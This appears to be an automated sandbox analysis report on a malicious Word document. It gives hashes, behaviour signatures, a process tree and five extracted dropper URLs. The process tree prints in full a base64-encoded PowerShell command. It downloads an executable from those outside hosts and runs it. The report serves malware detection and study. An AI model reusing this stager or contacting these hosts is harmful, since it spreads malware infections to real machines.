Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 16:34

General

  • Target

    63fafb0473cc7cf6b0907463dbba7e9b_JaffaCakes118.doc

  • Size

    232KB

  • MD5

    63fafb0473cc7cf6b0907463dbba7e9b

  • SHA1

    557e086209bf9b9ca62012e237687a6d57d71b61

  • SHA256

    5a339bed662000c7482bef1785340e56fb3f3a495dde5df8e37cc237ac111374

  • SHA512

    aba532b4c58ef2eee35d1c995a1ea8377b4a66d2eac19d9d70f6b594f2cdb90ee4cedbec6e2d73aa2e7cba5940420855355d05e1f437c8841b7992535d018151

  • SSDEEP

    3072:2j6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkrlDnc9k1/w4nRB:2HgtEWPsL/aTyT9Gk5Dnc9s/w4nRB

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kndesign.com.br/wwvv2/wPxxj0v53027676/

exe.dropper

http://load.studio/wp-admin/fqmCvt/

exe.dropper

http://melangefresh.com/partner/9lg91006/

exe.dropper

http://cengizgulec.com/wp-admin/wmZHHHARm/

exe.dropper

http://www.skydiarynepal.org/wp-admin/HWGaf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63fafb0473cc7cf6b0907463dbba7e9b_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABSAGMAdgB3AGYAbQBmAD0AJwBZAHoAagB5ADgAbQBuACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAFUAUgBpAHQAWQBwAFIATwBgAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABVAGUAagBzAF8AOAAwACAAPQAgACcATQBnAG8AYgAnADsAJABGAGkAegBvAG4AYQBoAD0AJwBVAG4AOQBpAHEAbAByACcAOwAkAEIAaABkAGgANAA1AGoAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABVAGUAagBzAF8AOAAwACsAJwAuAGUAeABlACcAOwAkAFUAeQBsADEAYgAwAGkAPQAnAFAAdwBjAHEAMwAzAGkAJwA7ACQAVwB0AGEAZQB2AGwAcAA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAHQALgBXAEUAYgBDAEwAaQBlAE4AdAA7ACQARgB4AF8AMAAxAGEANgA9ACcAaAB0AHQAcAA6AC8ALwBrAG4AZABlAHMAaQBnAG4ALgBjAG8AbQAuAGIAcgAvAHcAdwB2AHYAMgAvAHcAUAB4AHgAagAwAHYANQAzADAAMgA3ADYANwA2AC8AKgBoAHQAdABwADoALwAvAGwAbwBhAGQALgBzAHQAdQBkAGkAbwAvAHcAcAAtAGEAZABtAGkAbgAvAGYAcQBtAEMAdgB0AC8AKgBoAHQAdABwADoALwAvAG0AZQBsAGEAbgBnAGUAZgByAGUAcwBoAC4AYwBvAG0ALwBwAGEAcgB0AG4AZQByAC8AOQBsAGcAOQAxADAAMAA2AC8AKgBoAHQAdABwADoALwAvAGMAZQBuAGcAaQB6AGcAdQBsAGUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBtAFoASABIAEgAQQBSAG0ALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGsAeQBkAGkAYQByAHkAbgBlAHAAYQBsAC4AbwByAGcALwB3AHAALQBhAGQAbQBpAG4ALwBIAFcARwBhAGYALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFcAdgBsAHEAbwBnAGoAPQAnAEUAdgBuAHYAMgBhAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAbwA1AGYAZgBuAGoAIABpAG4AIAAkAEYAeABfADAAMQBhADYAKQB7AHQAcgB5AHsAJABXAHQAYQBlAHYAbABwAC4AIgBEAG8AVwBOAGwATwBgAEEARABmAEkAYABsAEUAIgAoACQARQBvADUAZgBmAG4AagAsACAAJABCAGgAZABoADQANQBqACkAOwAkAFcAawB6AHcAaQBuAG0APQAnAFoAdgA1ADMAMAAyADUAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABCAGgAZABoADQANQBqACkALgAiAGwAZQBOAGAARwBgAFQAaAAiACAALQBnAGUAIAAyADAAMgAxADgAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQAQgBoAGQAaAA0ADUAagApADsAJABNAG8ANwBfAGIAegB3AD0AJwBFAHUAcgB3AHkAbgB1ACcAOwBiAHIAZQBhAGsAOwAkAEwAdwByAGMAeABpAHMAPQAnAEIAcQA0AG4AcgBnAHAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgByAGoAeABtAHcANAA9ACcAQwBoAGIANQA3AHgAbAAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2456

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      6fad7b1f35f47b6018fdc802d185ad3c

      SHA1

      db7e03a8a0ecbeba8af957db251572b3f9de5741

      SHA256

      861286379fb38ca45bb9e25b04f22752e64d561855d9dbc222be4801e61084e4

      SHA512

      b33ae0edc97c253d192c4061433b1c9fca8e353b9c4fe86a5de078736c0c0a228b6c0f7ca3d9044fe7cafb841e7ad8c1f6f05b38c2f07d39978100862be2e04a

    • memory/1928-35-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-6-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-37-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-36-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-8-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-17-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-26-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-0-0x000000002FEF1000-0x000000002FEF2000-memory.dmp
      Filesize

      4KB

    • memory/1928-68-0x000000007141D000-0x0000000071428000-memory.dmp
      Filesize

      44KB

    • memory/1928-2-0x000000007141D000-0x0000000071428000-memory.dmp
      Filesize

      44KB

    • memory/1928-7-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1928-49-0x000000007141D000-0x0000000071428000-memory.dmp
      Filesize

      44KB

    • memory/1928-50-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-51-0x0000000005AA0000-0x0000000005BA0000-memory.dmp
      Filesize

      1024KB

    • memory/1928-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2456-44-0x00000000027F0000-0x00000000027F8000-memory.dmp
      Filesize

      32KB

    • memory/2456-43-0x000000001B700000-0x000000001B9E2000-memory.dmp
      Filesize

      2.9MB